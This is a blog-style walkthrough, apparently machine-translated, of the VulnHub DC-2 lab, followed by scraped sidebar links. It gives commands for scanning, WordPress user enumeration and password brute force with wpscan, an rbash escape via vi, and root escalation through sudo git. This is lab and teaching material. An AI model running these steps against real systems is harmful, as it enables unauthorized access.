当前位置:网站首页>【Try to Hack】vulnhub DC2
【Try to Hack】vulnhub DC2
2022-06-29 14:40:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 6 month 29 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
Target aircraft knowledge points :
1、hosts file
2、dirb Scan directory
3、wpscan Enumerate user names
4、cewl Crawl password
5、ssh Service login
6、rbash The escape
7、git Raise the right

The first is the bridging mode
It should be noted that this range is not static IP, that 192.168.0.145 Just an example , Tell us how to set up hosts Of documents
Download the target as usual , It defaults to the bridge mode 
No need to change
kali The attacker also sets the bridge mode ( I did it like this )
netdiscover Host discovery
Because the target is not in bridge mode , And our kali It may not be in the same segment arp-scan -l Can only scan and kali Hosts in the same network segment 
This is our target plane , because VMare,Inc
Port scanning namp -sV -p- 192.168.0.131
80 Port open , visit 192.168.0.131
This is the result
According to the description of the topic at the beginning , Go set up hostsvim /etc/hosts

Successful visit 
Prompt us to use cewlwhatweb 192.168.0.131
yes wordpress
dirb http://192.168.0.131
Directory scanning 
http://192.168.0.131/wp-admin/
It may be backstage , Visit 
Is, indeed, , Account and password required
Now we use cewl Well
Crawling website content , Generate Dictionary
cewl dc-2 > dc-2.txt
This is the password dictionary
We use wpscan Get username wpscan --url http://dc-2 -e u

Save as user.txt
wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
use bp It's fine too 
Sign in jerry, Just look for it 

Remind us not to use wordpress A loophole in the

I thought I could write shell Of
Log in with two accounts and passwords ssh
ssh -p 7744 [email protected]192.168.0.131
ssh -p 7744 [email protected]192.168.0.131

Log in , Also found that flag3 了
But the command to read the file is ban 了
See what commands you can use
echo $PATH
echo /home/tom/usr/bin/*

vi flag3.txt
I saw it flag
see wp understand , Let's use it tom The user switches to jerry
Need to use su

rbash The escape
rbash With the general shell The difference is that it limits some behaviors , Make some commands impossible to execute .
【 Penetration test 】— rbash Brief description of escape methods
stay vi Of : You can put /bin/bash Copy to shellvi
Input ::set shell=/bin/sh
Input again ::shell
obtain shell 了
After the switch is completed, add environment variables . to $PATH Add two paths to the variable , Used to find commands
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

succeed
Look for flag
Tips git
git Raise the right
Method 1
sudo git help config
!/bin/bash or !‘sh’
Method 2
sudo git -p help
!/bin/bash

边栏推荐
- Redis的持久化机制
- Turbulent intermediary business, restless renters
- stm32 mbed 入门教程(四)---PWM
- Can Ruida futures open an account? Is it safe and reliable?
- 《canvas》之第6章 图片操作
- [top] blog instructions, bulletin board, message board, about bloggers
- MySQL 数据库 - 通用语法 DDL DML DQL DCL
- Redis主从复制原理
- Thanos store component
- 微信小程序:修复采集接口版云开发表情包
猜你喜欢

leetcode:226. Flip binary tree

VQA needs not only pictures, but also external knowledge! University of Washington & Microsoft proposed revive, using gpt-3 and wikidata to help answer questions

Wechat applet: Yunkai publishes white wall wechat applet source code download server free and domain name support traffic main revenue

By proxy, by buyout, the wild era of domestic end-to-end travel is waiting for the next "eternal robbery"

揭秘!付费会员制下的那些小心机!

"Dead" Nokia makes 150billion a year

Turbulent intermediary business, restless renters

传输层 选择性确认 SACK

校园跑腿微信小程序跑腿同学带直播新版源码

驱动器实际运用案例
随机推荐
Turbulent intermediary business, restless renters
喜迎市科协“十大”•致敬科技工作者 | 卢毅:守护电网传输安全的探索者
《canvas》之第6章 图片操作
MySQL 数据库 - 通用语法 DDL DML DQL DCL
浅析 Istio——可观测性
golang代码规范整理
Redis' data expiration clearing strategy and memory obsolescence strategy
【关联分析实战篇】为什么 BI 软件都搞不定关联分析
matplotlib直方图,柱状图
Wechat applet: install B artifact and P diagram, modify wechat traffic main applet source code, Download funny joke diagram, make server free domain name
【重要通知】中国图象图形学学会2022年度系列奖励推荐工作启动
MySQL数据库:分区Partition
Transport layer user datagram protocol (UDP)
Using polymorphism to realize simple calculator
uniApp问题清单与经验
微信小程序:云开发表白墙微信小程序源码下载免服务器和域名支持流量主收益
Whitelabel Error Page访问
Thanos Store 组件
自动注入@Resource和@Autowired注解的区别:
一位博士在华为的22年